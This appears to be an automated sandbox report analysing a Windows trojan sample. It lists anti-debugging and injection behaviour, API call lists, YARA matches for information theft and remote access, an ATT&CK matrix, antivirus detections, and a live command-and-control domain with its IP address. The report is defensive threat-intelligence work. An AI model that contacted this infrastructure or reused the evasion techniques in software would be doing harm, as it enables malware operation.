                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeThread information set: HideFromDebuggerJump to behavior
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeThread information set: HideFromDebuggerJump to behavior
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeThread information set: HideFromDebuggerJump to behavior
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeThread information set: HideFromDebuggerJump to behavior
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeThread information set: HideFromDebuggerJump to behavior
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeThread information set: HideFromDebuggerJump to behavior
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeThread information set: HideFromDebuggerJump to behavior
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeThread information set: HideFromDebuggerJump to behavior
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeThread information set: HideFromDebuggerJump to behavior
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeThread information set: HideFromDebuggerJump to behavior
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeThread information set: HideFromDebuggerJump to behavior
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeThread information set: HideFromDebuggerJump to behavior
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeThread information set: HideFromDebuggerJump to behavior
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeThread information set: HideFromDebuggerJump to behavior
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeThread information set: HideFromDebuggerJump to behavior
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeThread information set: HideFromDebuggerJump to behavior
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeThread information set: HideFromDebuggerJump to behavior
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeCode function: 1_2_0047DA23 NtSetInformationThread ?,00000011,00000000,00000000,?,?,00000000,000000001_2_0047DA23
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeCode function: 0_2_00416CA0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00416CA0
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeCode function: 0_2_00409FD0 __wremove,_putc,_puts,_atexit,_malloc,_perror,InitializeCriticalSection,EnterCriticalSection,GetBinaryTypeW,GetConsoleAliasExesA,GetBinaryTypeW,GetConsoleAliasExesA,InitializeCriticalSection,EnterCriticalSection,GetNumberFormatW,WriteConsoleOutputCharacterA,ReadConsoleW,SetThreadPriority,FindNextVolumeMountPointW,SetProcessShutdownParameters,GetConsoleAliasesLengthW,SetProcessAffinityMask,OpenFileMappingW,OpenWaitableTimerW,AreFileApisANSI,CancelDeviceWakeupRequest,FindFirstVolumeA,GetConsoleAliasesLengthA,WinHttpConnect,GetLastError,GetCharWidthA,GetConsoleAliasesLengthA,WinHttpConnect,AlphaBlend,GetComputerNameW,TlsFree,DeleteAtom,GetModuleHandleW,EnumDateFormatsA,TlsFree,WriteConsoleOutputCharacterA,LoadLibraryW,DeleteAtom,GetModuleHandleW,GetPrivateProfileStringA,FreeEnvironmentStringsA,ResetWriteWatch,MoveFileA,GetConsoleAliasExesLengthW,EnumSystemLocalesW,_lopen,_lwrite,SetSystemTimeAdjustment,DebugBreak,MoveFileWithProgressA,SetCommState,EnumDateFormatsA,CreateMailslotW,WriteConsoleInputW,GetConsoleAliasExesLengthA,SetComputerNameW,GlobalGetAtomNameA,AllocConsole,GetQueuedCompletionStatus,GetProfileStringW,GetSystemWindowsDirectoryA,SetConsoleCP,VerSetConditionMask,EnumDateFormatsA,SetThreadAffinityMask,SetThreadAffinityMask,EnumCalendarInfoA,lstrcatA,LocalAlloc,FormatMessageW,FreeEnvironmentStringsA,EnumCalendarInfoA,lstrcatA,LocalAlloc,FormatMessageW,WriteConsoleInputW,GlobalWire,GetPrivateProfileSectionNamesA,WriteConsoleA,ReadConsoleW,DebugBreak,LoadLibraryW,lstrlenA,EnumResourceTypesA,OutputDebugStringW,_lwrite,GetConsoleAliasA,CreateActCtxW,GetPrivateProfileStringA,GetACP,CopyFileA,GetSystemWindowsDirectoryA,InterlockedExchangeAdd,ContinueDebugEvent,SetConsoleCursorPosition,GetConsoleAliasExesLengthA,0_2_00409FD0
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeCode function: 0_2_0041A080 LoadLibraryA,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,0_2_0041A080
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeCode function: 1_2_004B8B6B __EH_prolog,GetProcessHeap,HeapAlloc,1_2_004B8B6B
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeCode function: 0_2_022FB0A3 push dword ptr fs:[00000030h]0_2_022FB0A3
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeCode function: 1_2_006A482C mov eax, dword ptr fs:[00000030h]1_2_006A482C
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeCode function: 0_2_00411C80 SetUnhandledExceptionFilter,0_2_00411C80
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeCode function: 0_2_00416CA0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00416CA0
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeCode function: 0_2_0041F250 _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0041F250
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeCode function: 0_2_00411AC0 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00411AC0
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeCode function: 1_2_0068A7EA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_0068A7EA
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeCode function: 1_2_00694A7C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00694A7C

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeMemory written: C:\Users\user\Desktop\mzQcZawXvh.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeProcess created: C:\Users\user\Desktop\mzQcZawXvh.exe "C:\Users\user\Desktop\mzQcZawXvh.exe" Jump to behavior
                  Source: mzQcZawXvh.exe, 00000001.00000002.558474241.000000000386B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerZ
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeCode function: __wremove,_putc,_puts,_atexit,_malloc,_perror,InitializeCriticalSection,EnterCriticalSection,GetBinaryTypeW,GetConsoleAliasExesA,GetBinaryTypeW,GetConsoleAliasExesA,InitializeCriticalSection,EnterCriticalSection,GetNumberFormatW,WriteConsoleOutputCharacterA,ReadConsoleW,SetThreadPriority,FindNextVolumeMountPointW,SetProcessShutdownParameters,GetConsoleAliasesLengthW,SetProcessAffinityMask,OpenFileMappingW,OpenWaitableTimerW,AreFileApisANSI,CancelDeviceWakeupRequest,FindFirstVolumeA,GetConsoleAliasesLengthA,WinHttpConnect,GetLastError,GetCharWidthA,GetConsoleAliasesLengthA,WinHttpConnect,AlphaBlend,GetComputerNameW,TlsFree,DeleteAtom,GetModuleHandleW,EnumDateFormatsA,TlsFree,WriteConsoleOutputCharacterA,LoadLibraryW,DeleteAtom,GetModuleHandleW,GetPrivateProfileStringA,FreeEnvironmentStringsA,ResetWriteWatch,MoveFileA,GetConsoleAliasExesLengthW,EnumSystemLocalesW,_lopen,_lwrite,SetSystemTimeAdjustment,DebugBreak,MoveFileWithProgressA,SetCommState,EnumDateFormatsA,CreateMailslotW,WriteConsoleInputW,GetConsoleAliasExesLengthA,SetComputerNameW,GlobalGetAtomNameA,AllocConsole,GetQueuedCompletionStatus,GetProfileStringW,GetSystemWindowsDirectoryA,SetConsoleCP,VerSetConditionMask,EnumDateFormatsA,SetThreadAffinityMask,SetThreadAffinityMask,EnumCalendarInfoA,lstrcatA,LocalAlloc,FormatMessageW,FreeEnvironmentStringsA,EnumCalendarInfoA,lstrcatA,LocalAlloc,FormatMessageW,WriteConsoleInputW,GlobalWire,GetPrivateProfileSectionNamesA,WriteConsoleA,ReadConsoleW,DebugBreak,LoadLibraryW,lstrlenA,EnumResourceTypesA,OutputDebugStringW,_lwrite,GetConsoleAliasA,CreateActCtxW,GetPrivateProfileStringA,GetACP,CopyFileA,GetSystemWindowsDirectoryA,InterlockedExchangeAdd,ContinueDebugEvent,SetConsoleCursorPosition,GetConsoleAliasExesLengthA,0_2_00409FD0
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeCode function: GetBinaryTypeW,GetConsoleAliasExesA,InitializeCriticalSection,EnterCriticalSection,GetNumberFormatW,WriteConsoleOutputCharacterA,ReadConsoleW,SetThreadPriority,FindNextVolumeMountPointW,SetProcessShutdownParameters,GetConsoleAliasesLengthW,SetProcessAffinityMask,OpenFileMappingW,OpenWaitableTimerW,AreFileApisANSI,CancelDeviceWakeupRequest,FindFirstVolumeA,GetConsoleAliasesLengthA,WinHttpConnect,GetLastError,GetCharWidthA,GetConsoleAliasesLengthA,WinHttpConnect,AlphaBlend,GetComputerNameW,TlsFree,DeleteAtom,GetModuleHandleW,EnumDateFormatsA,TlsFree,WriteConsoleOutputCharacterA,LoadLibraryW,DeleteAtom,GetModuleHandleW,GetPrivateProfileStringA,FreeEnvironmentStringsA,ResetWriteWatch,MoveFileA,GetConsoleAliasExesLengthW,EnumSystemLocalesW,_lopen,_lwrite,SetSystemTimeAdjustment,DebugBreak,MoveFileWithProgressA,SetCommState,EnumDateFormatsA,CreateMailslotW,WriteConsoleInputW,GetConsoleAliasExesLengthA,SetComputerNameW,GlobalGetAtomNameA,AllocConsole,GetQueuedCompletionStatus,GetProfileStringW,GetSystemWindowsDirectoryA,SetConsoleCP,VerSetConditionMask,EnumDateFormatsA,SetThreadAffinityMask,SetThreadAffinityMask,EnumCalendarInfoA,lstrcatA,LocalAlloc,FormatMessageW,FreeEnvironmentStringsA,EnumCalendarInfoA,lstrcatA,LocalAlloc,FormatMessageW,WriteConsoleInputW,GlobalWire,GetPrivateProfileSectionNamesA,WriteConsoleA,ReadConsoleW,DebugBreak,LoadLibraryW,lstrlenA,EnumResourceTypesA,OutputDebugStringW,_lwrite,GetConsoleAliasA,CreateActCtxW,GetPrivateProfileStringA,GetACP,CopyFileA,GetSystemWindowsDirectoryA,InterlockedExchangeAdd,ContinueDebugEvent,SetConsoleCursorPosition,GetConsoleAliasExesLengthA,0_2_0040A039
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeCode function: GetLocaleInfoA,0_2_00420CD0
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeCode function: 1_2_0040EA72 cpuid 1_2_0040EA72
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeCode function: 0_2_00411CA0 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_00411CA0
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeCode function: 0_2_00409990 VerLanguageNameA,SetDefaultCommConfigW,ReadConsoleOutputCharacterW,VerifyVersionInfoA,GetVersionExW,QueryDepthSList,BuildCommDCBAndTimeoutsA,CopyFileExW,GetCompressedFileSizeW,FindNextFileW,SetEvent,QueryDepthSList,VerifyVersionInfoA,GetVersionExW,SetLastError,TerminateProcess,GetTimeZoneInformation,FillConsoleOutputCharacterA,0_2_00409990
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeCode function: 0_2_00409D50 GetSystemWow64DirectoryW,GetCPInfoExW,DisconnectNamedPipe,CopyFileA,GetLastError,SetConsoleTextAttribute,DebugBreak,SetCalendarInfoA,WriteProfileSectionW,GetLastError,CopyFileA,GetSystemWow64DirectoryW,GetCPInfoExW,DisconnectNamedPipe,GetStartupInfoA,InterlockedCompareExchange,HeapValidate,GetVersionExW,GlobalFix,TerminateProcess,GetUserDefaultLangID,WritePrivateProfileStringA,GetNamedPipeHandleStateW,TerminateProcess,GetUserDefaultLangID,WritePrivateProfileStringA,GetNamedPipeHandleStateW,GetModuleHandleW,SetDllDirectoryW,FormatMessageA,FindResourceW,ReleaseActCtx,GetCalendarInfoA,FindFirstChangeNotificationW,InterlockedDecrement,GetCommandLineA,GetProfileSectionA,GlobalFix,VerifyVersionInfoA,0_2_00409D50
                  Source: C:\Users\user\Desktop\mzQcZawXvh.exeCode function: 1_2_00471490 __EH_prolog,GetUserNameW,1_2_00471490

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 1.0.mzQcZawXvh.exe.400000.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.0.mzQcZawXvh.exe.400000.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.0.mzQcZawXvh.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.0.mzQcZawXvh.exe.400000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.0.mzQcZawXvh.exe.400000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.0.mzQcZawXvh.exe.400000.10.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.0.mzQcZawXvh.exe.400000.11.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.0.mzQcZawXvh.exe.400000.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.0.mzQcZawXvh.exe.400000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.0.mzQcZawXvh.exe.400000.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.0.mzQcZawXvh.exe.400000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.mzQcZawXvh.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.0.mzQcZawXvh.exe.400000.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.mzQcZawXvh.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.0.mzQcZawXvh.exe.400000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.0.mzQcZawXvh.exe.400000.10.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.0.mzQcZawXvh.exe.400000.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.mzQcZawXvh.exe.24e15a0.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.0.mzQcZawXvh.exe.400000.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.mzQcZawXvh.exe.24e15a0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.0.mzQcZawXvh.exe.400000.11.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.0.mzQcZawXvh.exe.400000.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.0.mzQcZawXvh.exe.400000.9.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000001.00000000.252764032.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000000.251383367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000000.246514986.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000000.247549851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000000.245538304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000000.249134372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000000.253448623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.257225352.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: mzQcZawXvh.exe PID: 5872, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: mzQcZawXvh.exe PID: 5012, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: 1.0.mzQcZawXvh.exe.400000.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.0.mzQcZawXvh.exe.400000.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.0.mzQcZawXvh.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.0.mzQcZawXvh.exe.400000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.0.mzQcZawXvh.exe.400000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.0.mzQcZawXvh.exe.400000.10.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.0.mzQcZawXvh.exe.400000.11.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.0.mzQcZawXvh.exe.400000.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.0.mzQcZawXvh.exe.400000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.0.mzQcZawXvh.exe.400000.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.0.mzQcZawXvh.exe.400000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.mzQcZawXvh.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.0.mzQcZawXvh.exe.400000.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.mzQcZawXvh.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.0.mzQcZawXvh.exe.400000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.0.mzQcZawXvh.exe.400000.10.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.0.mzQcZawXvh.exe.400000.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.mzQcZawXvh.exe.24e15a0.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.0.mzQcZawXvh.exe.400000.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.mzQcZawXvh.exe.24e15a0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.0.mzQcZawXvh.exe.400000.11.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.0.mzQcZawXvh.exe.400000.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.0.mzQcZawXvh.exe.400000.9.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000001.00000000.252764032.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000000.251383367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000000.246514986.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000000.247549851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000000.245538304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000000.249134372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000000.253448623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.257225352.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: mzQcZawXvh.exe PID: 5872, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: mzQcZawXvh.exe PID: 5012, type: MEMORYSTR
                  Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                  Valid Accounts3
                  Command and Scripting Interpreter
                  Path Interception1
                  Access Token Manipulation
                  131
                  Virtualization/Sandbox Evasion
                  1
                  Input Capture
                  2
                  System Time Discovery
                  Remote Services1
                  Input Capture
                  Exfiltration Over Other Network Medium1
                  Encrypted Channel
                  Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                  Default Accounts3
                  Native API
                  Boot or Logon Initialization Scripts112
                  Process Injection
                  1
                  Access Token Manipulation
                  LSASS Memory23
                  Security Software Discovery
                  Remote Desktop Protocol11
                  Archive Collected Data
                  Exfiltration Over Bluetooth1
                  Non-Standard Port
                  Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                  Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)112
                  Process Injection
                  Security Account Manager1
                  Process Discovery
                  SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
                  Ingress Tool Transfer
                  Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                  Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                  Deobfuscate/Decode Files or Information
                  NTDS131
                  Virtualization/Sandbox Evasion
                  Distributed Component Object ModelInput CaptureScheduled Transfer1
                  Non-Application Layer Protocol
                  SIM Card SwapCarrier Billing Fraud
                  Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script2
                  Obfuscated Files or Information
                  LSA Secrets1
                  Application Window Discovery
                  SSHKeyloggingData Transfer Size Limits21
                  Application Layer Protocol
                  Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                  Replication Through Removable MediaLaunchdRc.commonRc.common1
                  Software Packing
                  Cached Domain Credentials1
                  Account Discovery
                  VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                  External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync1
                  System Owner/User Discovery
                  Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                  Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
                  Remote System Discovery
                  Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                  Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow1
                  File and Directory Discovery
                  Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                  Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork Sniffing24
                  System Information Discovery
                  Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  mzQcZawXvh.exe20%MetadefenderBrowse
                  mzQcZawXvh.exe49%ReversingLabsWin32.Trojan.Tnega
                  mzQcZawXvh.exe100%Joe Sandbox ML
                  No Antivirus matches
                  SourceDetectionScannerLabelLinkDownload
                  1.0.mzQcZawXvh.exe.400000.11.unpack100%AviraHEUR/AGEN.1245145Download File
                  1.0.mzQcZawXvh.exe.400000.6.unpack100%AviraHEUR/AGEN.1245145Download File
                  1.0.mzQcZawXvh.exe.400000.8.unpack100%AviraHEUR/AGEN.1245145Download File
                  1.2.mzQcZawXvh.exe.400000.0.unpack100%AviraHEUR/AGEN.1245145Download File
                  1.0.mzQcZawXvh.exe.400000.4.unpack100%AviraHEUR/AGEN.1245145Download File
                  1.0.mzQcZawXvh.exe.400000.7.unpack100%AviraHEUR/AGEN.1245145Download File
                  1.0.mzQcZawXvh.exe.400000.10.unpack100%AviraHEUR/AGEN.1245145Download File
                  1.0.mzQcZawXvh.exe.400000.5.unpack100%AviraHEUR/AGEN.1245145Download File
                  1.0.mzQcZawXvh.exe.400000.9.unpack100%AviraHEUR/AGEN.1245145Download File
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  toopdyno2.duckdns.org100%Avira URL Cloudmalware
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  toopdyno2.duckdns.org
                  185.213.155.164
                  truetrue
                    unknown
                    NameMaliciousAntivirus DetectionReputation
                    toopdyno2.duckdns.orgtrue
                    • Avira URL Cloud: malware
                    unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    https://curl.haxx.se/docs/http-cookies.htmlmzQcZawXvh.exe, mzQcZawXvh.exe, 00000001.00000000.252764032.0000000000400000.00000040.00000400.00020000.00000000.sdmp, mzQcZawXvh.exe, 00000001.00000000.246514986.0000000000400000.00000040.00000400.00020000.00000000.sdmp, mzQcZawXvh.exe, 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                      high
                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs
                      IPDomainCountryFlagASNASN NameMalicious
                      185.213.155.164
                      toopdyno2.duckdns.orgSweden
                      39351ESAB-ASSEtrue
                      IP
                      192.168.2.1
                      Joe Sandbox Version:34.0.0 Boulder Opal
                      Analysis ID:589699
                      Start date and time:2022-03-15 16:28:17 +01:00
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:0h 9m 32s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Sample file name:mzQcZawXvh.exe
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                      Number of analysed new started processes analysed:11
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal100.troj.evad.winEXE@3/0@638/2
                      EGA Information:
                      • Successful, ratio: 100%
                      HDC Information:
                      • Successful, ratio: 23.2% (good quality ratio 21.9%)
                      • Quality average: 82.5%
                      • Quality standard deviation: 27.3%
                      HCA Information:Failed
                      Cookbook Comments:
                      • Adjust boot time
                      • Enable AMSI
                      • Found application associated with file extension: .exe
                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                      • Excluded domains from analysis (whitelisted): fs.microsoft.com
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size getting too big, too many NtDeviceIoControlFile calls found.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • VT rate limit hit for: mzQcZawXvh.exe
                      TimeTypeDescription
                      17:29:33API Interceptor651x Sleep call for process: mzQcZawXvh.exe modified
                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      185.213.155.1643Ddmw9TwGY.exeGet hashmaliciousBrowse
                        Za95JGZ8D7.exeGet hashmaliciousBrowse
                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                          toopdyno2.duckdns.org3Ddmw9TwGY.exeGet hashmaliciousBrowse
                          • 185.213.155.164
                          Za95JGZ8D7.exeGet hashmaliciousBrowse
                          • 185.213.155.164
                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                          ESAB-ASSE3Ddmw9TwGY.exeGet hashmaliciousBrowse
                          • 185.213.155.164
                          Za95JGZ8D7.exeGet hashmaliciousBrowse
                          • 185.213.155.164
                          b3astmode.arm7Get hashmaliciousBrowse
                          • 185.65.133.208
                          NMhjdmrpZiGet hashmaliciousBrowse
                          • 185.65.133.217
                          Heri2RE17IGet hashmaliciousBrowse
                          • 185.65.133.207
                          rXFu2DZdQqGet hashmaliciousBrowse
                          • 185.65.133.224
                          XC59Xztorr.exeGet hashmaliciousBrowse
                          • 185.65.135.234
                          SecuriteInfo.com.Variant.Razy.909711.11286.exeGet hashmaliciousBrowse
                          • 185.65.135.234
                          Software update v2.0.0.exeGet hashmaliciousBrowse
                          • 185.65.135.234
                          82Iqbsw9vI.exeGet hashmaliciousBrowse
                          • 185.65.135.234
                          GLBtdTEH84.exeGet hashmaliciousBrowse
                          • 185.65.135.234
